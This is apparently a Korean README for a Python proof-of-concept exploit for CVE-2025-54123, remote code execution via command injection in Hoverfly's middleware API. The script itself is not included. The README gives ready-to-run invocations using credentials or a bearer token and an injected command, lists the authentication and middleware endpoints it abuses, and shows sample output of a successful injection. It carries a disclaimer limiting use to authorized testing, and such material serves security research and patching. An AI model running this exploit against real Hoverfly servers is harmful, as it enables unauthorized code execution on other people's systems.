
CVE-2025-54123에 대한 Python 개념 증명(PoC)으로, 자격 증명 또는 토큰 기반 인증을 사용하는 Hoverfly 미들웨어 API에서 명령 주입(command injection)을 통해 RCE(원격 코드 실행)를 달성하는 방법을 보여줍니다.
이 저장소는 CVE-2025-54123의 영향을 받는 Hoverfly 인스턴스와 상호작용하기 위한 Python PoC(개념 증명) 스크립트를 포함합니다.
스크립트는 다음을 지원합니다:
경고
이 프로젝트는 승인된 보안 연구, 테스트 및 교육 목적으로만 사용됩니다. 명시적 허가 없이 시스템에 사용하지 마십시오.
의존성 설치:
pip install requests
python CVE-2025-54123.py \
--target example.com \
--port 8888 \
-u admin \
-p password \
--cmd "id"
python CVE-2025-54123.py \
--target example.com \
--port 8888 \
--token <ACCESS_TOKEN> \
--cmd "id"
| 인자 | 설명 |
|---|---|
--target | 대상 도메인 또는 IP 주소 |
--port | 대상 서비스 포트 |
-u | Hoverfly 사용자 이름 |
-p | Hoverfly 비밀번호 |
--token | 기존 Bearer 토큰 |
--cmd | 미들웨어 엔드포인트에 전달할 명령 문자열 |
자격 증명이 제공되면:
/api/token-auth
스크립트는 인증된 PUT 요청을 사용하여 다음 엔드포인트와 통신합니다:
/api/v2/hoverfly/middleware
Approaching target : example.com
Attempting login to http://example.com:8888/api/token-auth
Checking Credentials....
Login Successful!
Injected : id
uid=1000(user) gid=1000(user)
.
├── CVE-2025-54123.py
└── README.md
이 저장소는 교육적 목적, 방어적 보안 및 승인된 테스트 용도로만 제공됩니다. 저자는 이 소프트웨어의 사용으로 인한 오용, 손해 또는 법적 결과에 대해 책임을 지지 않습니다.